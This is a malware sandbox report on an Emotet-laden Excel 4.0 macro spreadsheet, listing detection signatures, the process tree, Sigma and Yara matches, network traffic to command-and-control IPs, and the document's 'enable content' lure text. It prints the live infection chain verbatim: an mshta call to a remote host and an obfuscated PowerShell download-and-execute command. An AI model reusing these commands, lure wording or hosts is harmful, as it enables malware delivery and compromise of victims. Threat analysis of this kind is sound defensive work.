Windows Analysis Report
DOCUMENT_2801.xls

Overview

General Information

Sample Name: DOCUMENT_2801.xls
Analysis ID: 562416
MD5: 3f397d9cca325167d86d575896d40207
SHA1: 54b8106c1715eb58230371fa033cbdec1e3aaeff
SHA256: f695adbe8668cdef7b307bc0fc89a664d8002b42dc91b8a01a75aec4cfc9018c
Tags: SilentBuilder, xls

Detection

Hidden Macro 4.0 Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Found malware configuration
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet
Multi AV Scanner detection for domain / URL
Sigma detected: Windows Shell File Write to Suspicious Folder
Document contains OLE streams with names of living off the land binaries
Passes commands via pipe to a shell (likely to bypass AV or HIPS)
Powershell drops PE file
Sigma detected: MSHTA Spawning Windows Shell
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Sigma detected: Suspicious MSHTA Process Patterns
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Suspicious PowerShell Command Line
Found Excel 4.0 Macro with suspicious formulas
Machine Learning detection for dropped file
Sigma detected: Mshta Spawning Windows Shell
C2 URLs / IPs found in malware configuration
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Document misses a certain OLE stream usually present in this Microsoft Office document type
Abnormal high CPU Usage
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Found large amount of non-executed APIs
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to delete services
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Potential document exploit detected (performs DNS queries)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
PE file contains an invalid checksum
Yara detected Xls With Macro 4.0
Detected TCP or UDP traffic on non-standard ports
Connects to several IPs in different countries
Potential key logger detected (key state polling based)
Creates a window with clipboard capturing capabilities
Document contains embedded VBA macros
Potential document exploit detected (performs HTTP gets)

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 684 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • cmd.exe (PID: 572 cmdline: cmd /c set ooo=mshta http://91.240.118.172/ee/ss/se.html & echo %ooo% | cmd MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • cmd.exe (PID: 2668 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo %ooo% " MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • cmd.exe (PID: 2672 cmdline: cmd MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
        • mshta.exe (PID: 2696 cmdline: mshta http://91.240.118.172/ee/ss/se.html MD5: 95828D670CFD3B16EE188168E083C3C5)
          • powershell.exe (PID: 1708 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FutuReD}{FutuReD}Ne{FutuReD}{FutuReD}w{FutuReD}-Obj{FutuReD}ec{FutuReD}{FutuReD}t N{FutuReD}{FutuReD}et{FutuReD}.W{FutuReD}{FutuReD}e'.replace('{FutuReD}', ''); $c4='bC{FutuReD}li{FutuReD}{FutuReD}en{FutuReD}{FutuReD}t).D{FutuReD}{FutuReD}ow{FutuReD}{FutuReD}nl{FutuReD}{FutuReD}{FutuReD}o'.replace('{FutuReD}', ''); $c3='ad{FutuReD}{FutuReD}St{FutuReD}rin{FutuReD}{FutuReD}g{FutuReD}(''ht{FutuReD}tp{FutuReD}://91.240.118.172/ee/ss/se.png'')'.replace('{FutuReD}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X MD5: 852D67A27E454BD389FA7F02A8CBE23F)
            • cmd.exe (PID: 1868 cmdline: "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\Milossd.dll KitKat MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
              • rundll32.exe (PID: 2844 cmdline: C:\Windows\SysWow64\rundll32.exe C:\ProgramData\Milossd.dll KitKat MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                • rundll32.exe (PID: 1124 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\Milossd.dll",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                  • rundll32.exe (PID: 344 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Hzcvqvi\kisyfwhhvxv.tpx",RIBFxhGufP MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                    • rundll32.exe (PID: 2816 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Hzcvqvi\kisyfwhhvxv.tpx",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                      • rundll32.exe (PID: 1532 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Gjesjojdky\tnenolnsbc.zlf",RPzUMBQVQiRJfbr MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                        • rundll32.exe (PID: 2904 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Gjesjojdky\tnenolnsbc.zlf",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
  • cleanup
Source | Rule | Description | Author | Strings
DOCUMENT_2801.xls | SUSP_Excel4Macro_AutoOpen | Detects Excel4 macro use with auto open / close | John Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x140a2:$s1: Excel
  • 0x15105:$s1: Excel
  • 0x3106:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
DOCUMENT_2801.xls | JoeSecurity_XlsWithMacro4 | Yara detected Xls With Macro 4.0 | Joe Security

Source | Rule | Description | Author | Strings
C:\Users\user\Desktop\DOCUMENT_2801.xls | SUSP_Excel4Macro_AutoOpen | Detects Excel4 macro use with auto open / close | John Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x140a2:$s1: Excel
  • 0x15105:$s1: Excel
  • 0x3106:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
C:\Users\user\Desktop\DOCUMENT_2801.xls | JoeSecurity_XlsWithMacro4 | Yara detected Xls With Macro 4.0 | Joe Security
C:\ProgramData\Milossd.dll | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security

Source | Rule | Description | Author | Strings
00000011.00000002.664811796.0000000002D81000.00000020.00000001.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
0000000C.00000002.510464737.0000000002CF1000.00000020.00000800.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
0000000E.00000002.559443936.00000000001E0000.00000040.00000800.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
0000000C.00000002.510287777.00000000026A1000.00000020.00000800.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
0000000C.00000002.510076235.0000000000810000.00000040.00000800.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security

Source | Rule | Description | Author | Strings
17.2.rundll32.exe.27d0000.7.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
14.2.rundll32.exe.25b0000.9.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
17.2.rundll32.exe.3090000.27.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
17.2.rundll32.exe.2f70000.23.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
13.2.rundll32.exe.3c0000.0.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security

                            System Summary

                            Source: File createdAuthor: Florian Roth: Data: EventID: 11, Image: C:\Windows\System32\mshta.exe, ProcessId: 2696, TargetFilename: C:\Users\user\AppData\Local
                            Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FutuReD}{FutuReD}Ne{FutuReD}{FutuReD}w{FutuReD}-Obj{FutuReD}ec{FutuReD}{FutuReD}t N{FutuReD}{FutuReD}et{FutuReD}.W{FutuReD}{FutuReD}e'.replace('{FutuReD}', ''); $c4='bC{FutuReD}li{FutuReD}{FutuReD}en{FutuReD}{FutuReD}t).D{FutuReD}{FutuReD}ow{FutuReD}{FutuReD}nl{FutuReD}{FutuReD}{FutuReD}o'.replace('{FutuReD}', ''); $c3='ad{FutuReD}{FutuReD}St{FutuReD}rin{FutuReD}{FutuReD}g{FutuReD}(''ht{FutuReD}tp{FutuReD}://91.240.118.172/ee/ss/se.png'')'.replace('{FutuReD}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FutuReD}{FutuReD}Ne{FutuReD}{FutuReD}w{FutuReD}-Obj{FutuReD}ec{FutuReD}{FutuReD}t N{FutuReD}{FutuReD}et{FutuReD}.W{FutuReD}{FutuReD}e'.replace('{FutuReD}', ''); $c4='bC{FutuReD}li{FutuReD}{FutuReD}en{FutuReD}{FutuReD}t).D{FutuReD}{FutuReD}ow{FutuReD}{FutuReD}nl{FutuReD}{FutuReD}{FutuReD}o'.replace('{FutuReD}', ''); $c3='ad{FutuReD}{FutuReD}St{FutuReD}rin{FutuReD}{FutuReD}g{FutuReD}(''ht{FutuReD}tp{FutuReD}://91.240.118.172/ee/ss/se.png'')'.replace('{FutuReD}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.172/ee/ss/se.html , ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2696, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FutuReD}{FutuReD}Ne{FutuReD}{FutuReD}w{FutuReD}-Obj{FutuReD}ec{FutuReD}{FutuReD}t N{FutuReD}{FutuReD}et{FutuReD}.W{FutuReD}{FutuReD}e'.replace('{FutuReD}', ''); 
$c4='bC{FutuReD}li{FutuReD}{FutuReD}en{FutuReD}{FutuReD}t).D{FutuReD}{FutuReD}ow{FutuReD}{FutuReD}nl{FutuReD}{FutuReD}{FutuReD}o'.replace('{FutuReD}', ''); $c3='ad{FutuReD}{FutuReD}St{FutuReD}rin{FutuReD}{FutuReD}g{FutuReD}(''ht{FutuReD}tp{FutuReD}://91.240.118.172/ee/ss/se.png'')'.replace('{FutuReD}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 1708
                            Source: Process startedAuthor: Florian Roth: Data: Command: mshta http://91.240.118.172/ee/ss/se.html , CommandLine: mshta http://91.240.118.172/ee/ss/se.html , CommandLine|base64offset|contains: m, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: cmd, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2672, ProcessCommandLine: mshta http://91.240.118.172/ee/ss/se.html , ProcessId: 2696
                            Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: cmd /c set ooo=mshta http://91.240.118.172/ee/ss/se.html & echo %ooo% | cmd, CommandLine: cmd /c set ooo=mshta http://91.240.118.172/ee/ss/se.html & echo %ooo% | cmd, CommandLine|base64offset|contains: rg, Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 684, ProcessCommandLine: cmd /c set ooo=mshta http://91.240.118.172/ee/ss/se.html & echo %ooo% | cmd, ProcessId: 572
                            Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FutuReD}{FutuReD}Ne{FutuReD}{FutuReD}w{FutuReD}-Obj{FutuReD}ec{FutuReD}{FutuReD}t N{FutuReD}{FutuReD}et{FutuReD}.W{FutuReD}{FutuReD}e'.replace('{FutuReD}', ''); $c4='bC{FutuReD}li{FutuReD}{FutuReD}en{FutuReD}{FutuReD}t).D{FutuReD}{FutuReD}ow{FutuReD}{FutuReD}nl{FutuReD}{FutuReD}{FutuReD}o'.replace('{FutuReD}', ''); $c3='ad{FutuReD}{FutuReD}St{FutuReD}rin{FutuReD}{FutuReD}g{FutuReD}(''ht{FutuReD}tp{FutuReD}://91.240.118.172/ee/ss/se.png'')'.replace('{FutuReD}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FutuReD}{FutuReD}Ne{FutuReD}{FutuReD}w{FutuReD}-Obj{FutuReD}ec{FutuReD}{FutuReD}t N{FutuReD}{FutuReD}et{FutuReD}.W{FutuReD}{FutuReD}e'.replace('{FutuReD}', ''); $c4='bC{FutuReD}li{FutuReD}{FutuReD}en{FutuReD}{FutuReD}t).D{FutuReD}{FutuReD}ow{FutuReD}{FutuReD}nl{FutuReD}{FutuReD}{FutuReD}o'.replace('{FutuReD}', ''); $c3='ad{FutuReD}{FutuReD}St{FutuReD}rin{FutuReD}{FutuReD}g{FutuReD}(''ht{FutuReD}tp{FutuReD}://91.240.118.172/ee/ss/se.png'')'.replace('{FutuReD}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.172/ee/ss/se.html , ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2696, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FutuReD}{FutuReD}Ne{FutuReD}{FutuReD}w{FutuReD}-Obj{FutuReD}ec{FutuReD}{FutuReD}t N{FutuReD}{FutuReD}et{FutuReD}.W{FutuReD}{FutuReD}e'.replace('{FutuReD}', ''); 
$c4='bC{FutuReD}li{FutuReD}{FutuReD}en{FutuReD}{FutuReD}t).D{FutuReD}{FutuReD}ow{FutuReD}{FutuReD}nl{FutuReD}{FutuReD}{FutuReD}o'.replace('{FutuReD}', ''); $c3='ad{FutuReD}{FutuReD}St{FutuReD}rin{FutuReD}{FutuReD}g{FutuReD}(''ht{FutuReD}tp{FutuReD}://91.240.118.172/ee/ss/se.png'')'.replace('{FutuReD}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 1708
                            Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FutuReD}{FutuReD}Ne{FutuReD}{FutuReD}w{FutuReD}-Obj{FutuReD}ec{FutuReD}{FutuReD}t N{FutuReD}{FutuReD}et{FutuReD}.W{FutuReD}{FutuReD}e'.replace('{FutuReD}', ''); $c4='bC{FutuReD}li{FutuReD}{FutuReD}en{FutuReD}{FutuReD}t).D{FutuReD}{FutuReD}ow{FutuReD}{FutuReD}nl{FutuReD}{FutuReD}{FutuReD}o'.replace('{FutuReD}', ''); $c3='ad{FutuReD}{FutuReD}St{FutuReD}rin{FutuReD}{FutuReD}g{FutuReD}(''ht{FutuReD}tp{FutuReD}://91.240.118.172/ee/ss/se.png'')'.replace('{FutuReD}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FutuReD}{FutuReD}Ne{FutuReD}{FutuReD}w{FutuReD}-Obj{FutuReD}ec{FutuReD}{FutuReD}t N{FutuReD}{FutuReD}et{FutuReD}.W{FutuReD}{FutuReD}e'.replace('{FutuReD}', ''); $c4='bC{FutuReD}li{FutuReD}{FutuReD}en{FutuReD}{FutuReD}t).D{FutuReD}{FutuReD}ow{FutuReD}{FutuReD}nl{FutuReD}{FutuReD}{FutuReD}o'.replace('{FutuReD}', ''); $c3='ad{FutuReD}{FutuReD}St{FutuReD}rin{FutuReD}{FutuReD}g{FutuReD}(''ht{FutuReD}tp{FutuReD}://91.240.118.172/ee/ss/se.png'')'.replace('{FutuReD}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.172/ee/ss/se.html , ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2696, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FutuReD}{FutuReD}Ne{FutuReD}{FutuReD}w{FutuReD}-Obj{FutuReD}ec{FutuReD}{FutuReD}t N{FutuReD}{FutuReD}et{FutuReD}.W{FutuReD}{FutuReD}e'.replace('{FutuReD}', ''); 
$c4='bC{FutuReD}li{FutuReD}{FutuReD}en{FutuReD}{FutuReD}t).D{FutuReD}{FutuReD}ow{FutuReD}{FutuReD}nl{FutuReD}{FutuReD}{FutuReD}o'.replace('{FutuReD}', ''); $c3='ad{FutuReD}{FutuReD}St{FutuReD}rin{FutuReD}{FutuReD}g{FutuReD}(''ht{FutuReD}tp{FutuReD}://91.240.118.172/ee/ss/se.png'')'.replace('{FutuReD}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 1708
                            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FutuReD}{FutuReD}Ne{FutuReD}{FutuReD}w{FutuReD}-Obj{FutuReD}ec{FutuReD}{FutuReD}t N{FutuReD}{FutuReD}et{FutuReD}.W{FutuReD}{FutuReD}e'.replace('{FutuReD}', ''); $c4='bC{FutuReD}li{FutuReD}{FutuReD}en{FutuReD}{FutuReD}t).D{FutuReD}{FutuReD}ow{FutuReD}{FutuReD}nl{FutuReD}{FutuReD}{FutuReD}o'.replace('{FutuReD}', ''); $c3='ad{FutuReD}{FutuReD}St{FutuReD}rin{FutuReD}{FutuReD}g{FutuReD}(''ht{FutuReD}tp{FutuReD}://91.240.118.172/ee/ss/se.png'')'.replace('{FutuReD}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FutuReD}{FutuReD}Ne{FutuReD}{FutuReD}w{FutuReD}-Obj{FutuReD}ec{FutuReD}{FutuReD}t N{FutuReD}{FutuReD}et{FutuReD}.W{FutuReD}{FutuReD}e'.replace('{FutuReD}', ''); $c4='bC{FutuReD}li{FutuReD}{FutuReD}en{FutuReD}{FutuReD}t).D{FutuReD}{FutuReD}ow{FutuReD}{FutuReD}nl{FutuReD}{FutuReD}{FutuReD}o'.replace('{FutuReD}', ''); $c3='ad{FutuReD}{FutuReD}St{FutuReD}rin{FutuReD}{FutuReD}g{FutuReD}(''ht{FutuReD}tp{FutuReD}://91.240.118.172/ee/ss/se.png'')'.replace('{FutuReD}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.172/ee/ss/se.html , ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2696, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FutuReD}{FutuReD}Ne{FutuReD}{FutuReD}w{FutuReD}-Obj{FutuReD}ec{FutuReD}{FutuReD}t N{FutuReD}{FutuReD}et{FutuReD}.W{FutuReD}{FutuReD}e'.replace('{FutuReD}', ''); 
$c4='bC{FutuReD}li{FutuReD}{FutuReD}en{FutuReD}{FutuReD}t).D{FutuReD}{FutuReD}ow{FutuReD}{FutuReD}nl{FutuReD}{FutuReD}{FutuReD}o'.replace('{FutuReD}', ''); $c3='ad{FutuReD}{FutuReD}St{FutuReD}rin{FutuReD}{FutuReD}g{FutuReD}(''ht{FutuReD}tp{FutuReD}://91.240.118.172/ee/ss/se.png'')'.replace('{FutuReD}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 1708

                            AV Detection

                            Source: 17.2.rundll32.exe.3090000.27.unpackMalware Configuration Extractor: Emotet
Source: DOCUMENT_2801.xls | ReversingLabs: Detection: 16%
Source: tamiladsense.com | Virustotal: Detection: 7%
Source: C:\ProgramData\Milossd.dll | Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,11_2_10021854
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,13_2_10021854
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 17_2_0035BAEA FindFirstFileW,17_2_0035BAEA

                            Software Vulnerabilities

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\cmd.exe
Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 91.240.118.172:80
Source: global traffic | DNS query: name: tamiladsense.com

                            Networking

Source: Traffic | Snort IDS: 2034631 ET TROJAN Maldoc Activity (set) 192.168.2.22:49166 -> 91.240.118.172:80
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 74.207.230.120 144
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 139.196.72.155 144
                            Source: global trafficHTTP traffic detected: GET /ee/ss/se.png HTTP/1.1Host: 91.240.118.172Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wp-includes/BEADvqGgemV8SnTX/ HTTP/1.1Host: tamiladsense.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKConnection: Keep-AliveSet-Cookie: 61f44ecc07555=1643400908; expires=Fri, 28-Jan-2022 20:16:08 GMT; Max-Age=60; path=/Cache-Control: no-cache, must-revalidatePragma: no-cacheLast-Modified: Fri, 28 Jan 2022 20:15:08 GMTExpires: Fri, 28 Jan 2022 20:15:08 GMTContent-Type: application/x-msdownloadContent-Disposition: attachment; filename="XrEtCt.dll"Content-Transfer-Encoding: binaryContent-Length: 557056Date: Fri, 28 Jan 2022 20:15:08 GMT
                            Source: global trafficHTTP traffic detected: GET /ee/ss/se.html HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.240.118.172Connection: Keep-Alive
                            Source: Joe Sandbox ViewASN Name: AS-CHOOPAUS AS-CHOOPAUS
                            Source: Joe Sandbox ViewASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
                            Source: Joe Sandbox ViewIP Address: 207.148.81.119 207.148.81.119
                            Source: Joe Sandbox ViewIP Address: 104.131.62.48 104.131.62.48
                            Source: global trafficTCP traffic: 192.168.2.22:49169 -> 74.207.230.120:8080
                            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 139.196.72.155:8080
                            Source: unknownNetwork traffic detected: IP country count 15
                            Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\se[1].htmJump to behavior
                            Source: unknownDNS traffic detected: queries for: tamiladsense.com
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10012C30 _memset,connect,_strcat,send,recv,11_2_10012C30
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 74.207.230.120
                            Source: unknownTCP traffic detected without corresponding DNS query: 139.196.72.155
                            Source: mshta.exe, 00000006.00000003.428066381.00000000004BC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.429429555.00000000004BC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.412759270.00000000004BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
                            Source: mshta.exe, 00000006.00000003.428066381.00000000004BC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.429429555.00000000004BC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.412759270.00000000004BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
                            Source: rundll32.exe, 00000011.00000002.663586016.00000000004E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1001B43F GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,11_2_1001B43F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_1001B43F GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,13_2_1001B43F
                            Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                            E-Banking Fraud

                            Source: Yara match File source: C:\ProgramData\Milossd.dll, type: DROPPED

                            System Summary

                            Source: DOCUMENT_2801.xls Macro extractor: Sheet: Macro3 contains: mshta
                            Source: Screenshot number: 4 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 21 22
                            Source: Screenshot number: 4 Screenshot OCR: DOCUMENT IS PROTECTED. 11 12 13 Previewing is not available for protected documents. 14 15 Yo
                            Source: Screenshot number: 4 Screenshot OCR: protected documents. 14 15 You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to pre
                            Source: Screenshot number: 4 Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 21 22 23 24 25 26 27 2
                            Source: Document image extraction number: 0 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                            Source: Document image extraction number: 0 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                            Source: Document image extraction number: 0 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
